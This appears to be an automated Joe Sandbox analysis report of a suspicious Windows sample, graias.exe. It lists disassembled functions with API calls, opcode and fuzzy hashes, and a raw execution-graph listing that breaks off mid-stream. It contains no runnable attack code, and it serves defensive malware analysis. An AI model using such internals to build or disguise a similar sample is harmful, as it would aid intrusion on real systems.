                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                                                                                            • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                                                                                                                            Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Graias\graias.exe,00000104), ref: 10004C1D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10004CE8
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10004CF2
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                            • API String ID: 2506810119-2791163094
                                                                                                                                                                                                                                            • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                                                                                            • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                                                                                                                            Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 100087D5
                                                                                                                                                                                                                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2652629310-0
                                                                                                                                                                                                                                            • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                                                                                            • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                                                                                                                            Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3177248105-0
                                                                                                                                                                                                                                            • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                                                                                            • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                                                                                                                                            Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _strlen
                                                                                                                                                                                                                                            • String ID: : $Se.
                                                                                                                                                                                                                                            • API String ID: 4218353326-4089948878
                                                                                                                                                                                                                                            • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                                                                            • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                                                                                                                            Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                                                                                                                              • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                            • String ID: Unknown exception
                                                                                                                                                                                                                                            • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                            • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                                                                                            • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:6.2%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                                                                            Signature Coverage:0.8%
                                                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                                                            Total number of Limit Nodes:61
                                                                                                                                                                                                                                            execution_graph 40512 441819 40515 430737 40512->40515 40514 441825 40516 430756 40515->40516 40517 43076d 40515->40517 40518 430774 40516->40518 40519 43075f 40516->40519 40517->40514 40530 43034a memcpy 40518->40530 40529 4169a7 11 API calls 40519->40529 40522 4307ce 40523 430819 memset 40522->40523 40531 415b2c 11 API calls 40522->40531 40523->40517 40524 43077e 40524->40517 40524->40522 40527 4307fa 40524->40527 40526 4307e9 40526->40517 40526->40523 40532 4169a7 11 API calls 40527->40532 40529->40517 40530->40524 40531->40526 40532->40517 37540 442ec6 19 API calls 37717 4152c6 malloc 37718 4152e2 37717->37718 37719 4152ef 37717->37719 37721 416760 11 API calls 37719->37721 37721->37718 38294 4466f4 38313 446904 38294->38313 38296 446700 GetModuleHandleA 38299 446710 __set_app_type __p__fmode __p__commode 38296->38299 38298 4467a4 38300 4467ac __setusermatherr 38298->38300 38301 4467b8 38298->38301 38299->38298 38300->38301 38314 4468f0 _controlfp 38301->38314 38303 4467bd _initterm __wgetmainargs _initterm 38304 446810 38303->38304 38305 44681e GetStartupInfoW 38303->38305 38307 446866 GetModuleHandleA 38305->38307 38315 41276d 38307->38315 38311 446896 exit 38312 44689d _cexit 38311->38312 38312->38304 38313->38296 38314->38303 38316 41277d 38315->38316 38358 4044a4 LoadLibraryW 38316->38358 38318 412785 38319 412789 38318->38319 38366 414b81 38318->38366 38319->38311 38319->38312 38322 4127c8 38372 412465 memset ??2@YAPAXI 38322->38372 38324 4127ea 38384 40ac21 38324->38384 38329 412813 38402 40dd07 memset 38329->38402 38330 412827 38407 40db69 memset 38330->38407 38333 412822 38428 4125b6 ??3@YAXPAX 38333->38428 38335 40ada2 _wcsicmp 38336 41283d 38335->38336 38336->38333 38339 412863 CoInitialize 38336->38339 38412 41268e 38336->38412 38432 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38339->38432 38341 41296f 38434 40b633 38341->38434 38346 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38350 412957 CoUninitialize 38346->38350 38355 4128ca 38346->38355 38350->38333 38351 4128d0 TranslateAcceleratorW 38352 412941 GetMessageW 38351->38352 38351->38355 38352->38350 38352->38351 38353 412909 IsDialogMessageW 38353->38352 38353->38355 38354 4128fd IsDialogMessageW 38354->38352 38354->38353 38355->38351 38355->38353 38355->38354 38356 41292b TranslateMessage DispatchMessageW 38355->38356 38357 41291f IsDialogMessageW 38355->38357 38356->38352 38357->38352 38357->38356 38359 4044f7 38358->38359 38360 4044cf GetProcAddress 38358->38360 38364 404507 MessageBoxW 38359->38364 38365 40451e 38359->38365 38361 4044e8 FreeLibrary 38360->38361 38362 4044df 38360->38362 38361->38359 38363 4044f3 38361->38363 38362->38361 38363->38359 38364->38318 38365->38318 38367 414b8a 38366->38367 38368 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38366->38368 38438 40a804 memset 38367->38438 38368->38322 38371 414b9e GetProcAddress 38371->38368 38373 4124e0 38372->38373 38374 412505 ??2@YAPAXI 38373->38374 38375 41251c 38374->38375 38377 412521 38374->38377 38460 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38375->38460 38449 444722 38377->38449 38383 41259b wcscpy 38383->38324 38465 40b1ab free free 38384->38465 38386 40ac5c 38389 40a9ce malloc memcpy free free 38386->38389 38390 40ad4b 38386->38390 38392 40ace7 free 38386->38392 38397 40ad76 38386->38397 38469 40a8d0 38386->38469 38481 4099f4 38386->38481 38389->38386 38390->38397 38489 40a9ce 38390->38489 38392->38386 38396 40a8d0 7 API calls 38396->38397 38466 40aa04 38397->38466 38398 40ada2 38400 40adc9 38398->38400 38401 40adaa 38398->38401 38399 40adb3 _wcsicmp 38399->38400 38399->38401 38400->38329 38400->38330 38401->38399 38401->38400 38494 40dce0 38402->38494 38404 40dd3a GetModuleHandleW 38499 40dba7 38404->38499 38408 40dce0 3 API calls 38407->38408 38409 40db99 38408->38409 38571 40dae1 38409->38571 38585 402f3a 38412->38585 38414 412766 38414->38333 38414->38339 38415 4126d3 _wcsicmp 38416 4126a8 38415->38416 38416->38414 38416->38415 38418 41270a 38416->38418 38619 4125f8 7 API calls 38416->38619 38418->38414 38588 411ac5 38418->38588 38429 4125da 38428->38429 38430 4125f0 38429->38430 38431 4125e6 DeleteObject 38429->38431 38433 40b1ab free free 38430->38433 38431->38430 38432->38346 38433->38341 38435 40b640 38434->38435 38436 40b639 free 38434->38436 38437 40b1ab free free 38435->38437 38436->38435 38437->38319 38439 40a83b GetSystemDirectoryW 38438->38439 38440 40a84c wcscpy 38438->38440 38439->38440 38445 409719 wcslen 38440->38445 38443 40a881 LoadLibraryW 38444 40a886 38443->38444 38444->38368 38444->38371 38446 409724 38445->38446 38447 409739 wcscat LoadLibraryW 38445->38447 38446->38447 38448 40972c wcscat 38446->38448 38447->38443 38447->38444 38448->38447 38450 444732 38449->38450 38451 444728 DeleteObject 38449->38451 38461 409cc3 38450->38461 38451->38450 38453 412551 38454 4010f9 38453->38454 38455 401130 38454->38455 38456 401134 GetModuleHandleW LoadIconW 38455->38456 38457 401107 wcsncat 38455->38457 38458 40a7be 38456->38458 38457->38455 38459 40a7d2 38458->38459 38459->38383 38459->38459 38460->38377 38464 409bfd memset wcscpy 38461->38464 38463 409cdb CreateFontIndirectW 38463->38453 38464->38463 38465->38386 38467 40aa14 38466->38467 38468 40aa0a free 38466->38468 38467->38398 38468->38467 38470 40a8eb 38469->38470 38471 40a8df wcslen 38469->38471 38472 40a906 free 38470->38472 38473 40a90f 38470->38473 38471->38470 38474 40a919 38472->38474 38475 4099f4 3 API calls 38473->38475 38476 40a932 38474->38476 38477 40a929 free 38474->38477 38475->38474 38478 4099f4 3 API calls 38476->38478 38479 40a93e memcpy 38477->38479 38480 40a93d 38478->38480 38479->38386 38480->38479 38482 409a41 38481->38482 38483 4099fb malloc 38481->38483 38482->38386 38485 409a37 38483->38485 38486 409a1c 38483->38486 38485->38386 38487 409a30 free 38486->38487 38488 409a20 memcpy 38486->38488 38487->38485 38488->38487 38490 40a9e7 38489->38490 38491 40a9dc free 38489->38491 38493 4099f4 3 API calls 38490->38493 38492 40a9f2 38491->38492 38492->38396 38493->38492 38518 409bca GetModuleFileNameW 38494->38518 38496 40dce6 wcsrchr 38497 40dcf5 38496->38497 38498 40dcf9 wcscat 38496->38498 38497->38498 38498->38404 38519 44db70 38499->38519 38503 40dbfd 38522 4447d9 38503->38522 38506 40dc34 wcscpy wcscpy 38548 40d6f5 38506->38548 38507 40dc1f wcscpy 38507->38506 38510 40d6f5 3 API calls 38511 40dc73 38510->38511 38512 40d6f5 3 API calls 38511->38512 38513 40dc89 38512->38513 38514 40d6f5 3 API calls 38513->38514 38515 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38514->38515 38554 40da80 38515->38554 38518->38496 38520 40dbb4 memset memset 38519->38520 38521 409bca GetModuleFileNameW 38520->38521 38521->38503 38524 4447f4 38522->38524 38523 40dc1b 38523->38506 38523->38507 38524->38523 38525 444807 ??2@YAPAXI 38524->38525 38526 44481f 38525->38526 38527 444873 _snwprintf 38526->38527 38528 4448ab wcscpy 38526->38528 38561 44474a 8 API calls 38527->38561 38530 4448bb 38528->38530 38562 44474a 8 API calls 38530->38562 38532 4448a7 38532->38528 38532->38530 38533 4448cd 38563 44474a 8 API calls 38533->38563 38535 4448e2 38564 44474a 8 API calls 38535->38564 38537 4448f7 38565 44474a 8 API calls 38537->38565 38539 44490c 38566 44474a 8 API calls 38539->38566 38541 444921 38567 44474a 8 API calls 38541->38567 38543 444936 38568 44474a 8 API calls 38543->38568 38545 44494b 38569 44474a 8 API calls 38545->38569 38547 444960 ??3@YAXPAX 38547->38523 38549 44db70 38548->38549 38550 40d702 memset GetPrivateProfileStringW 38549->38550 38551 40d752 38550->38551 38552 40d75c WritePrivateProfileStringW 38550->38552 38551->38552 38553 40d758 38551->38553 38552->38553 38553->38510 38555 44db70 38554->38555 38556 40da8d memset 38555->38556 38557 40daac LoadStringW 38556->38557 38558 40dac6 38557->38558 38558->38557 38560 40dade 38558->38560 38570 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38558->38570 38560->38333 38561->38532 38562->38533 38563->38535 38564->38537 38565->38539 38566->38541 38567->38543 38568->38545 38569->38547 38570->38558 38581 409b98 GetFileAttributesW 38571->38581 38573 40daea 38574 40db63 38573->38574 38575 40daef wcscpy wcscpy GetPrivateProfileIntW 38573->38575 38574->38335 38582 40d65d GetPrivateProfileStringW 38575->38582 38577 40db3e 38583 40d65d GetPrivateProfileStringW 38577->38583 38579 40db4f 38584 40d65d GetPrivateProfileStringW 38579->38584 38581->38573 38582->38577 38583->38579 38584->38574 38620 40eaff 38585->38620 38589 411ae2 memset 38588->38589 38590 411b8f 38588->38590 38660 409bca GetModuleFileNameW 38589->38660 38602 411a8b 38590->38602 38592 411b0a wcsrchr 38593 411b22 wcscat 38592->38593 38594 411b1f 38592->38594 38661 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38593->38661 38594->38593 38596 411b67 38662 402afb 38596->38662 38600 411b7f 38718 40ea13 SendMessageW memset SendMessageW 38600->38718 38603 402afb 27 API calls 38602->38603 38604 411ac0 38603->38604 38605 4110dc 38604->38605 38606 41113e 38605->38606 38611 4110f0 38605->38611 38743 40969c LoadCursorW SetCursor 38606->38743 38608 411143 38744 4032b4 38608->38744 38762 444a54 38608->38762 38609 4110f7 _wcsicmp 38609->38611 38610 411157 38612 40ada2 _wcsicmp 38610->38612 38611->38606 38611->38609 38765 410c46 10 API calls 38611->38765 38615 411167 38612->38615 38613 4111af 38615->38613 38616 4111a6 qsort 38615->38616 38616->38613 38619->38416 38621 40eb10 38620->38621 38633 40e8e0 38621->38633 38624 40eb6c memcpy memcpy 38628 40ebb7 38624->38628 38625 40ebf2 ??2@YAPAXI ??2@YAPAXI 38627 40ec2e ??2@YAPAXI 38625->38627 38630 40ec65 38625->38630 38626 40d134 16 API calls 38626->38628 38627->38630 38628->38624 38628->38625 38628->38626 38630->38630 38643 40ea7f 38630->38643 38632 402f49 38632->38416 38634 40e8f2 38633->38634 38635 40e8eb ??3@YAXPAX 38633->38635 38636 40e900 38634->38636 38637 40e8f9 ??3@YAXPAX 38634->38637 38635->38634 38638 40e911 38636->38638 38639 40e90a ??3@YAXPAX 38636->38639 38637->38636 38640 40e931 ??2@YAPAXI ??2@YAPAXI 38638->38640 38641 40e921 ??3@YAXPAX 38638->38641 38642 40e92a ??3@YAXPAX 38638->38642 38639->38638 38640->38624 38641->38642 38642->38640 38644 40aa04 free 38643->38644 38645 40ea88 38644->38645 38646 40aa04 free 38645->38646 38647 40ea90 38646->38647 38648 40aa04 free 38647->38648 38649 40ea98 38648->38649 38650 40aa04 free 38649->38650 38651 40eaa0 38650->38651 38652 40a9ce 4 API calls 38651->38652 38653 40eab3 38652->38653 38654 40a9ce 4 API calls 38653->38654 38655 40eabd 38654->38655 38656 40a9ce 4 API calls 38655->38656 38657 40eac7 38656->38657 38658 40a9ce 4 API calls 38657->38658 38659 40ead1 38658->38659 38659->38632 38660->38592 38661->38596 38719 40b2cc 38662->38719 38664 402b0a 38665 40b2cc 27 API calls 38664->38665 38666 402b23 38665->38666 38667 40b2cc 27 API calls 38666->38667 38668 402b3a 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 402b54 38669->38670 38671 40b2cc 27 API calls 38670->38671 38672 402b6b 38671->38672 38673 40b2cc 27 API calls 38672->38673 38674 402b82 38673->38674 38675 40b2cc 27 API calls 38674->38675 38676 402b99 38675->38676 38677 40b2cc 27 API calls 38676->38677 38678 402bb0 38677->38678 38679 40b2cc 27 API calls 38678->38679 38680 402bc7 38679->38680 38681 40b2cc 27 API calls 38680->38681 38682 402bde 38681->38682 38683 40b2cc 27 API calls 38682->38683 38684 402bf5 38683->38684 38685 40b2cc 27 API calls 38684->38685 38686 402c0c 38685->38686 38687 40b2cc 27 API calls 38686->38687 38688 402c23 38687->38688 38689 40b2cc 27 API calls 38688->38689 38690 402c3a 38689->38690 38691 40b2cc 27 API calls 38690->38691 38692 402c51 38691->38692 38693 40b2cc 27 API calls 38692->38693 38694 402c68 38693->38694 38695 40b2cc 27 API calls 38694->38695 38696 402c7f 38695->38696 38697 40b2cc 27 API calls 38696->38697 38698 402c99 38697->38698 38699 40b2cc 27 API calls 38698->38699 38700 402cb3 38699->38700 38701 40b2cc 27 API calls 38700->38701 38702 402cd5 38701->38702 38703 40b2cc 27 API calls 38702->38703 38704 402cf0 38703->38704 38705 40b2cc 27 API calls 38704->38705 38706 402d0b 38705->38706 38707 40b2cc 27 API calls 38706->38707 38708 402d26 38707->38708 38709 40b2cc 27 API calls 38708->38709 38710 402d3e 38709->38710 38711 40b2cc 27 API calls 38710->38711 38712 402d59 38711->38712 38713 40b2cc 27 API calls 38712->38713 38714 402d78 38713->38714 38715 40b2cc 27 API calls 38714->38715 38716 402d93 38715->38716 38717 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38716->38717 38717->38600 38718->38590 38722 40b58d 38719->38722 38721 40b2d1 38721->38664 38723 40b5a4 GetModuleHandleW FindResourceW 38722->38723 38724 40b62e 38722->38724 38725 40b5c2 LoadResource 38723->38725 38727 40b5e7 38723->38727 38724->38721 38726 40b5d0 SizeofResource LockResource 38725->38726 38725->38727 38726->38727 38727->38724 38735 40afcf 38727->38735 38729 40b608 memcpy 38738 40b4d3 memcpy 38729->38738 38731 40b61e 38739 40b3c1 18 API calls 38731->38739 38733 40b626 38740 40b04b 38733->38740 38736 40b04b ??3@YAXPAX 38735->38736 38737 40afd7 ??2@YAPAXI 38736->38737 38737->38729 38738->38731 38739->38733 38741 40b051 ??3@YAXPAX 38740->38741 38742 40b05f 38740->38742 38741->38742 38742->38724 38743->38608 38745 4032c4 38744->38745 38746 40b633 free 38745->38746 38747 403316 38746->38747 38766 44553b 38747->38766 38751 403480 38964 40368c 15 API calls 38751->38964 38753 403489 38754 40b633 free 38753->38754 38755 403495 38754->38755 38755->38610 38756 4033a9 memset memcpy 38757 4033ec wcscmp 38756->38757 38758 40333c 38756->38758 38757->38758 38758->38751 38758->38756 38758->38757 38962 4028e7 11 API calls 38758->38962 38963 40f508 6 API calls 38758->38963 38760 403421 _wcsicmp 38760->38758 38763 444a64 FreeLibrary 38762->38763 38764 444a83 38762->38764 38763->38764 38764->38610 38765->38611 38767 445548 38766->38767 38768 445599 38767->38768 38965 40c768 38767->38965 38769 4455a8 memset 38768->38769 38912 4457f2 38768->38912 39048 403988 38769->39048 38776 445854 38777 4458aa 38776->38777 39174 403c9c memset memset memset memset memset 38776->39174 38779 44594a 38777->38779 38780 4458bb memset memset 38777->38780 38778 445672 39059 403fbe memset memset memset memset memset 38778->39059 38782 4459ed 38779->38782 38783 44595e memset memset 38779->38783 38785 414c2e 16 API calls 38780->38785 38788 445a00 memset memset 38782->38788 38789 445b22 38782->38789 38790 414c2e 16 API calls 38783->38790 38784 4455e5 38784->38778 38802 44560f 38784->38802 38791 4458f9 38785->38791 39197 414c2e 38788->39197 38794 445bca 38789->38794 38795 445b38 memset memset memset 38789->38795 38800 44599c 38790->38800 38801 40b2cc 27 API calls 38791->38801 38812 445c8b memset memset 38794->38812 38862 445cf0 38794->38862 38807 445bd4 38795->38807 38808 445b98 38795->38808 38796 445849 39262 40b1ab free free 38796->39262 38811 40b2cc 27 API calls 38800->38811 38813 445909 38801->38813 38804 4087b3 338 API calls 38802->38804 38823 445621 38804->38823 38806 44589f 39263 40b1ab free free 38806->39263 38820 414c2e 16 API calls 38807->38820 38808->38807 38816 445ba2 38808->38816 38825 4459ac 38811->38825 38814 414c2e 16 API calls 38812->38814 38822 409d1f 6 API calls 38813->38822 38826 445cc9 38814->38826 39335 4099c6 wcslen 38816->39335 38817 4456b2 39250 40b1ab free free 38817->39250 38819 40b2cc 27 API calls 38829 445a4f 38819->38829 38831 445be2 38820->38831 38821 403335 38961 4452e5 45 API calls 38821->38961 38834 445919 38822->38834 39248 4454bf 20 API calls 38823->39248 38824 445823 38824->38796 38842 4087b3 338 API calls 38824->38842 38835 409d1f 6 API calls 38825->38835 38836 409d1f 6 API calls 38826->38836 38827 445879 38827->38806 38846 4087b3 338 API calls 38827->38846 39212 409d1f wcslen wcslen 38829->39212 38840 40b2cc 27 API calls 38831->38840 38832 445d3d 38860 40b2cc 27 API calls 38832->38860 38833 445d88 memset memset memset 38843 414c2e 16 API calls 38833->38843 39264 409b98 GetFileAttributesW 38834->39264 38844 4459bc 38835->38844 38845 445ce1 38836->38845 38837 445bb3 39338 445403 memset 38837->39338 38838 445680 38838->38817 39082 4087b3 memset 38838->39082 38849 445bf3 38840->38849 38842->38824 38852 445dde 38843->38852 39331 409b98 GetFileAttributesW 38844->39331 39355 409b98 GetFileAttributesW 38845->39355 38846->38827 38859 409d1f 6 API calls 38849->38859 38850 445928 38850->38779 39265 40b6ef 38850->39265 38861 40b2cc 27 API calls 38852->38861 38854 4459cb 38854->38782 38871 40b6ef 252 API calls 38854->38871 38858 40b2cc 27 API calls 38864 445a94 38858->38864 38866 445c07 38859->38866 38867 445d54 _wcsicmp 38860->38867 38870 445def 38861->38870 38862->38821 38862->38832 38862->38833 38863 445389 258 API calls 38863->38794 39217 40ae18 38864->39217 38865 44566d 38865->38912 39133 413d4c 38865->39133 38874 445389 258 API calls 38866->38874 38875 445d71 38867->38875 38938 445d67 38867->38938 38869 445665 39249 40b1ab free free 38869->39249 38876 409d1f 6 API calls 38870->38876 38871->38782 38879 445c17 38874->38879 39356 445093 23 API calls 38875->39356 38882 445e03 38876->38882 38878 4456d8 38884 40b2cc 27 API calls 38878->38884 38885 40b2cc 27 API calls 38879->38885 38881 44563c 38881->38869 38887 4087b3 338 API calls 38881->38887 39357 409b98 GetFileAttributesW 38882->39357 38883 40b6ef 252 API calls 